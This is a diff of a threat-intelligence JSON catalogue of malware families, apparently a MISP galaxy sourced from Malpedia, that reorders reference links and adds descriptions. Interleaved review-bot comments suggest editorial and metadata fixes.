+ "https://blog.google/technology/safety-security/continuing-our-work-to-hold-cybercriminal-ecosystems-accountable/",
+ "https://asec.ahnlab.com/en/24423/",
+ "https://www.bleepingcomputer.com/news/security/malicious-kmspico-installers-steal-your-cryptocurrency-wallets/",
+ "https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/",
+ "https://experience.mandiant.com/trending-evil-2/p/1",
+ "https://asec.ahnlab.com/en/35981/",
+ "https://redcanary.com/wp-content/uploads/2021/12/KMSPico-V5.pdf",
+ "https://www.bleepingcomputer.com/news/security/revamped-cryptbot-malware-spread-by-pirated-software-sites/",
+ "https://regmedia.co.uk/2023/04/28/handout_google_cryptbot_complaint.pdf",
 "https://www.gdatasoftware.com/blog/2020/02/35802-bitbucket-abused-as-malware-slinger",
+ "https://fr3d.hk/blog/cryptbot-too-good-to-be-true",
+ "https://blogs.blackberry.com/en/2022/03/threat-thursday-cryptbot-infostealer",
+ "https://research.openanalysis.net/cryptbot/botnet/yara/config/2023/03/16/cryptbot.html",
+ "https://asec.ahnlab.com/en/31802/",
 "https://www.mandiant.com/resources/russian-targeting-gov-business",
- "https://blogs.blackberry.com/en/2022/03/threat-thursday-cryptbot-infostealer"
+ "https://asec.ahnlab.com/en/31683/"
 ],
 "synonyms": [],
 "type": []
@@ -20076,16 +21013,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
- "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
 "https://www.secureworks.com/research/cryptolocker-ransomware",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "http://www.secureworks.com/research/threat-profiles/gold-evergreen",
+ "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware"
+ "http://www.secureworks.com/research/threat-profiles/gold-evergreen",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
+ "https://www.secureworks.com/research/threat-profiles/gold-evergreen"
 ],
 "synonyms": [],
 "type": []
@@ -20112,9 +21049,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix",
 "https://www.bleepingcomputer.com/news/security/new-azer-cryptomix-ransomware-variant-released/",
- "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
+ "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/",
 "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/",
- "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/"
+ "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/"
 ],
 "synonyms": [
 "Azer",
@@ -20179,13 +21116,13 @@
 "value": "CryptoShuffler"
 },
 {
- "description": "",
+ "description": "CryptoWall is a ransomware, is usually spread by spam and phishing emails, malicious ads, hacked websites, or other malware and uses a Trojan horse to deliver the malicious payload.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f",
- "https://sites.temple.edu/care/ci-rw-attacks/"
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -20211,8 +21148,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress",
- "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html",
- "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/"
+ "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/",
+ "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html"
 ],
 "synonyms": [],
 "type": []
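Review bot: The new CryptoWall description in the `@@ -20179` hunk is ungrammatical: `CryptoWall is a ransomware, is usually spread by ...` splices two predicates with a comma, and "ransomware" is a mass noun that does not take "a". A cleaner version keeping the same claims would be `"description": "CryptoWall is ransomware that is usually spread by spam and phishing emails, malicious ads, hacked websites, or other malware, and that uses a Trojan horse to deliver the malicious payload."`.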
@@ -20252,7 +21189,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.crytox",
- "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware"
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware",
+ "https://labs.k7computing.com/index.php/encrypted-chaos-analysis-of-crytox-ransomware/"
 ],
 "synonyms": [],
 "type": []
@@ -20293,26 +21231,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-335a-stopransomware-cuba-ransomware.pdf", + "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-cuba-ransomware/", + "https://securelist.com/cuba-ransomware/110533/", + "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", + "https://lab52.io/blog/cuba-ransomware-analysis/", + "https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/", + "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", + "https://www.it-connect.fr/le-ransomware-cuba-sen-prend-aux-serveurs-exchange/", "https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group+-+on+a+roll.pdf", "https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html", - "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", - "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-cuba-ransomware/", - "https://lab52.io/blog/cuba-ransomware-analysis/", - "https://www.mandiant.com/resources/unc2596-cuba-ransomware", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware", - "https://www.ic3.gov/Media/News/2021/211203-2.pdf", - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-335a-stopransomware-cuba-ransomware.pdf", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", - "https://blog.group-ib.com/hancitor-cuba-ransomware", - 
"https://www.fortinet.com/blog/threat-research/ransomware-roundup-gwisin-kriptor-cuba-and-more", - "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf", - "https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html", - "https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis", - "https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/", "https://www.guidepointsecurity.com/blog/using-hindsight-to-close-a-cuba-cold-case/", - "https://www.it-connect.fr/le-ransomware-cuba-sen-prend-aux-serveurs-exchange/" + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware", + "https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf", + "https://www.fortinet.com/blog/threat-research/ransomware-roundup-gwisin-kriptor-cuba-and-more", + "https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis", + "https://www.mandiant.com/resources/unc2596-cuba-ransomware", + "https://www.ic3.gov/Media/News/2021/211203-2.pdf", + "https://blog.group-ib.com/hancitor-cuba-ransomware" ], "synonyms": [ "COLDDRAW" 
@@ -20327,9 +21266,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", + "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", - "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal" + "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html" ], "synonyms": [], "type": [] @@ -20350,14 +21289,30 @@ "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", "value": "Cueisfry" }, + { + "description": "Potential Lazarus sample.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cur1_downloader", + "https://mp.weixin.qq.com/s/nnLqUBPX8xZ3hCr5u-iSjQ", + "https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html", + "https://twitter.com/RedDrip7/status/1595365451495706624", + "https://securelist.com/bluenoroff-methods-bypass-motw/108383/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cca4f240-ac69-437e-b02a-5483ebef5087", + "value": "Cur1Downloader" + }, { "description": "Profero describes this as a ransomware family using CryptoPP as library to enable file encryption with the Salsa20 algorithm and protecting the encryption keys with RSA2048.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.curator", "https://shared-public-reports.s3.eu-west-1.amazonaws.com/Secrets_behind_the_mysterious_ever101_ransomware.pdf", - "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/", - "https://seguranca-informatica.pt/analysis-of-the-sunnyday-ransomware/" + "https://seguranca-informatica.pt/analysis-of-the-sunnyday-ransomware/", + "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/" ], "synonyms": [ "Ever101", 
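Review bot: The new Cur1Downloader entry's description, `"Potential Lazarus sample."`, asserts an attribution, but the entry carries no `related` link to a threat-actor cluster and no estimative-language tag, so the hedge exists only as free text that consumers cannot filter or query on; the same applies to the Dacls entry further down, whose description ties it to Lazarus Group in prose only. If the importer preserves hand-maintained relations, a `related` entry pointing at the Lazarus actor cluster with an `estimative-language:likelihood-probability` tag would carry the same uncertainty in machine-readable form. The actor UUID below is a placeholder to be replaced with the real cluster id, and `used-by` is the malware-to-actor direction if that is the convention this galaxy follows; given that the only visible support is the BlueNoroff and DangerousPassword write-ups in `refs`, `likely` rather than a stronger value is the appropriate likelihood.
```json
    "synonyms": [],
    "type": []
  },
  "related": [
    {
      "dest-uuid": "<LAZARUS-ACTOR-CLUSTER-UUID placeholder>",
      "tags": [
        "estimative-language:likelihood-probability=\"likely\""
      ],
      "type": "used-by"
    }
  ],
  "uuid": "cca4f240-ac69-437e-b02a-5483ebef5087",
```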
@@ -20381,15 +21336,28 @@ "uuid": "600a73bf-d699-4400-ac35-6aed4ae5e528", "value": "Cursed Murderer" }, + { + "description": "CustomerLoader is a .Net-based loader that drops more than 40 different malware families. It appeared in June 2023 and is being distributed via phishing, YouTube videos and malicious websites.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.customerloader", + "https://blog.sekoia.io/customerloader-a-new-malware-distributing-a-wide-variety-of-payloads/#h-c2-servers" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b002e530-38d5-48cf-90a9-5731871fae32", + "value": "CustomerLoader" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", + "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html", "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", "https://explore.group-ib.com/htct/hi-tech_crime_2018", - "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html", - "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [], "type": [] 
@@ -20402,20 +21370,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", - "https://darknetdiaries.com/episode/110/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "http://www.secureworks.com/research/threat-profiles/gold-essex", - "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", + "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://darknetdiaries.com/episode/110/", "https://www.secureworks.com/research/threat-profiles/gold-essex", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf" + 
"https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/", + "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [], "type": [] 
@@ -20424,18 +21392,18 @@ "value": "Cutwail" }, { - "description": "According to Subex Secure, CyberGate is a Remote Access Trojan (RAT) that allows an attacker to gain unauthorized access to\r\nthe victim’s system. Attackers can remotely connect to the compromised system from anywhere\r\naround the world. The Malware author generally uses this program to steal private information\r\nlike passwords, files, etc. It might also be used to install malicious software on the compromised\r\nsystems.\r\n", + "description": "According to Subex Secure, CyberGate is a Remote Access Trojan (RAT) that allows an attacker to gain unauthorized access to\r\nthe victim\u2019s system. Attackers can remotely connect to the compromised system from anywhere\r\naround the world. The Malware author generally uses this program to steal private information\r\nlike passwords, files, etc. It might also be used to install malicious software on the compromised\r\nsystems.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", - "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", - "https://blog.reversinglabs.com/blog/rats-in-the-library", "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", "https://www.subexsecure.com/pdf/malware-reports/2021-05/cybergate-threat-report.pdf", - "https://citizenlab.ca/2015/12/packrat-report/", - "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns", "https://sectrio.com/wp-content/uploads/2021/08/cybergate-threat-report.pdf", + "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://citizenlab.ca/2015/12/packrat-report/", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + 
"https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" ], "synonyms": [ @@ -20472,7 +21440,7 @@ "value": "CycBot" }, { - "description": "Ransomware.", + "description": "According to gdatasoftware, Cyrat ransomware uses Fernet to encrypt files. This is a symmetric encryption method meant for small data files that fit into RAM. While Fernet is not unusual itself, it is not common for ransomware and in this case even problematic.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat", 
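Review bot: The CyberGate description on the new side still embeds raw `\r\n` line breaks mid-sentence and ends with a trailing `\r\n`; the only change this hunk makes to it is re-escaping the curly apostrophe as `\u2019` (both spellings are valid JSON), so the hard-wrapped source text is carried into the cluster value verbatim. Consumers rendering this field get Windows line endings inside what is a single-paragraph description, and the same problem appears in the Dacls description (`\r\n\r\n` between paragraphs) and the DanaBot description (trailing space before the closing quote, and the pre-existing `Proofpoints` typo) in later hunks. Normalising the upstream text once during import — replacing `\r\n` sequences with a single space and stripping leading and trailing whitespace — would make these values consistent with the other single-line descriptions in the file. The importer that produces these values is outside the diff, so this is a suggestion for the import step rather than for the hunk lines themselves.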
@@ -20499,18 +21467,19 @@ "value": "cysxl" }, { - "description": "", + "description": "According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.\r\n\r\nResearch shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dacls", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://malwareandstuff.com/peb-where-magic-is-stored/", "https://blog.netlab.360.com/dacls-the-dual-platform-rat/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", + "https://malwareandstuff.com/peb-where-magic-is-stored/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://blogs.vmware.com/security/2022/11/threat-analysis-active-c2-discovery-using-protocol-emulation-part4-dacls-aka-mata.html", "https://www.sygnia.co/mata-framework", - "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://vblocalhost.com/uploads/VB2021-Park.pdf" ], "synonyms": [ "MATA" 
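Review bot: The new Dacls description ends with consumer-advice boilerplate copied from the PCrisk source (`In any case, no RAT is harmless and should be uninstalled immediately.`) that says nothing about the malware and does not belong in a threat-intelligence cluster value. Trimming the quoted text to its descriptive sentences keeps the attribution to PCrisk while dropping the filler: `"According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely. Research shows that this malware is tied to Lazarus Group and targets Linux and the Windows Operating System."`. The `MATA` synonym and the added VB2021 reference are consistent with that shorter description, so nothing else in the hunk needs to change.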
@@ -20525,12 +21494,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke", - "https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts", - "https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/", - "https://twitter.com/a_tweeter_user/status/1154764787823316993", - "https://twitter.com/ClearskySec/status/1110941178231484417", "https://www.youtube.com/watch?v=vx9IB88wXSE", - "https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9" + "https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9", + "https://twitter.com/ClearskySec/status/1110941178231484417", + "https://twitter.com/a_tweeter_user/status/1154764787823316993", + "https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/", + "https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts" ], "synonyms": [], "type": [] @@ -20543,12 +21512,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache", - "https://medium.com/insomniacs/dad-theres-a-rat-in-here-e3729b65bf7a", "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", - "https://twitter.com/killamjr/status/1204584085395517440", - "https://danielplohmann.github.io/blog/2020/07/10/kf-sandbox-necromancy.html", "https://medium.com/insomniacs/apt40-goes-from-template-injections-to-ole-linkings-for-payload-delivery-99eb43170a97", - "https://twitter.com/cyb3rops/status/1199978327697694720" + "https://medium.com/insomniacs/dad-theres-a-rat-in-here-e3729b65bf7a", + "https://danielplohmann.github.io/blog/2020/07/10/kf-sandbox-necromancy.html", + "https://twitter.com/cyb3rops/status/1199978327697694720", + "https://twitter.com/killamjr/status/1204584085395517440" ], "synonyms": [], "type": [] 
@@ -20570,52 +21539,53 @@ "value": "Dairy" }, { - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. 
", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", - "https://malverse.it/costruiamo-un-config-extractor-per-danabot-parte-1", - "https://www.bitdefender.com/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack/", "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/", - "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/", - "https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense", - "https://research.checkpoint.com/danabot-demands-a-ransom-payment/", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.mandiant.com/resources/supply-chain-node-js", - "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://malwareandstuff.com/deobfuscating-danabots-api-hashing/", - "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html", + "https://assets.virustotal.com/reports/2021trends.pdf", "https://asec.ahnlab.com/en/30445/", - "https://www.zscaler.com/blogs/security-research/technical-analysis-danabot-obfuscation-techniques", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://blog.lexfo.fr/danabot-malware.html", - "https://security-soup.net/decoding-a-danabot-downloader/", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", - "https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot", - 
"https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/", - "https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", - "https://blogs.blackberry.com/en/2021/11/threat-thursday-danabot-malware-as-a-service", - "https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github", - "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed", - "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", - "https://www.zscaler.com/blogs/security-research/spike-danabot-malware-activity", "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/", "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/", + "https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + 
"https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html", + "https://malverse.it/costruiamo-un-config-extractor-per-danabot-parte-1", + "https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://www.zscaler.com/blogs/security-research/technical-analysis-danabot-obfuscation-techniques", + "https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github", + "https://www.mandiant.com/resources/supply-chain-node-js", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://security-soup.net/decoding-a-danabot-downloader/", + "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://flashpoint.io/blog/danabot-version-3-what-you-need-to-know/", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://www.zscaler.com/blogs/security-research/spike-danabot-malware-activity", + "https://blog.lexfo.fr/danabot-malware.html", + "https://www.bitdefender.com/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", + 
"https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", + "https://research.checkpoint.com/danabot-demands-a-ransom-payment/", "https://twitter.com/f0wlsec/status/1459892481760411649", - "https://assets.virustotal.com/reports/2021trends.pdf", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/" + "https://malwareandstuff.com/deobfuscating-danabots-api-hashing/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://blogs.blackberry.com/en/2021/11/threat-thursday-danabot-malware-as-a-service", + "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", + 